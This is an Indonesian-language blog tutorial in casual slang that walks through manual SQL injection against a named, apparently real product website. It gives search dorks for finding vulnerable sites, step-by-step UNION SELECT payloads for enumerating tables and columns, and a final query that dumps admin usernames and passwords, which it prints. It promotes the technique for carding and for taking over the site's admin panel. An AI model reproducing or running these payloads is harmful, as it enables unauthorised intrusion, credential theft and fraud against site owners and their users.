Contohnya username dan password admin, sering juga buat mencari cc (carding).
Dork :
- inurl:"index.php?id="
- inurl:"product.php?id="
1. Dorking dulu.. Contoh target gue > www.pdkudalaut.com/detailproduk.php?id=44. Kalo nyari yang kayak gitu ya biar bisa diinject (sesudah sama dengan (=) ada angka/kata-katanya).
2. Tambahin string atau tanda petik 1 ('), jadinya www.pdkudalaut.com/detailproduk.php?id=44'. Kalo muncul error berarti vuln. Perlu diingat kalau vuln gak selalu muncul error, kadang juga pagenya blank pas dites.
3. Selanjutnya kita hitung jumlah column databasenya. Caranya setelah angka kita beri perintah order by 1, dan seterusnya. Spasinya pake +, dan diakhiran diberi -- contoh :
www.pdkudalaut.com/detailproduk.php?id=44+order+by+1--, di situ terlihat kalau sitenya gak error.
www.pdkudalaut.com/detailproduk.php?id=44+order+by+1-- -> gak error
www.pdkudalaut.com/detailproduk.php?id=44+order+by+2-- -> gak error
www.pdkudalaut.com/detailproduk.php?id=44+order+by+3-- -> gak error
www.pdkudalaut.com/detailproduk.php?id=44+order+by+9-- -> gak error
www.pdkudalaut.com/detailproduk.php?id=44+order+by+10-- -> error
Nah kita nemu jumlah column ada 9, karena pas ngitung ke 10 muncul error.
5. Ganti order by dengan perintah union select. Sebelum angka ditambahin - dan setelah perintah ditambahin --. Ntar bakal muncul angka di sitenya, gue dapet angka 2, 3, 4, ama 5. Contoh :
http://www.pdkudalaut.com/detailproduk.php?id=-44+union+select+1,2,3,4,5,6,7,8,9--
6. Saatnya kita checking berapa versi database site tersebut. Pilih salah satu angka, ganti angka tersebut jadi @@version. Contoh di sini gue milih angka 2, maka angka 2 diganti @@version :
www.pdkudalaut.com/detailproduk.php?id=-44+union+select+1,@@version,3,4,5,6,7,8,9--
7. Versi database target gue versi 5 ea.. Kalo dapet yang versi 4 buang ae dah :P versi 4 ribet kudu nebak tabelnya satu-satu. Kuy selanjutnya kita bongkar tabel-tabelnya perintah @@version ganti dengan group_concat(table_name), sebelum -- tambahin perintah +from+information_schema.tables+where+table_schema=database() contoh :
http://www.pdkudalaut.com/detailproduk.php?id=-44+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--
8. Muncul nama-nama tabel, cari tabel yang menurut lu isinya username sama password admin. Di sini gue nemu tabel user. Ingat ea gak semua tabel setiap site sama, biasanya sih ada di admin, tbladmin, tbadmin, users, user. Pandai-pandai elu aja :""v
9. Saatnya kita bongkar data dari tabel user. Perintah group_concat(table_name) diganti dengan group_concat(column_name) , lalu perintah from+information_schema.tables+where+table_schema=database() diganti sama from+information_schema.columns+where+table_name=char(). Kalo udah lu pergi ke www.easycalculation.com/ascii-hex.php
User jadiin decimal/ascii dulu, kalo udah masukin ke dalam char(), jadinya char(117, 115, 101, 114). Pisahin angka pake koma ya. Contoh :
www.pdkudalaut.com/detailproduk.php?id=-44+union+select+1,group_concat(column_name),3,4,5,6,7,8,9+from+information_schema.columns+where+table_name=char(117,115,101,114)--
10. Gue nemu user, pass, sama email. Di sini gue mau bongkar username sama passwordnya aja ya. Ganti group_concat(column_name) jadi group_concat(user,0x3a,pass,0x3a). 0x3a adalah tanda : yang dijadiin decimal. Nah perintah yang panjang tadi yang from+blablabla, diganti jadi from+user (user adalah nama tabel yang gue bongkar tadi, bukan nama datanya ya). Contoh :
www.pdkudalaut.com/detailproduk.php?id=-44+union+select+1,group_concat(user,0x3a,pass,0x3a),3,4,5,6,7,8,9+from+user--
11. Dor berhasil nemu username sama password admin webnya.
username : admin | wendy
password : 12345 | W210789
Sekarang tinggal cari admin login terus tebas ea..
Oke gitu aja dah tutor kali ini, moga bermanfaat ea buat kalean heker penerus bangsa >:(
0 Komentar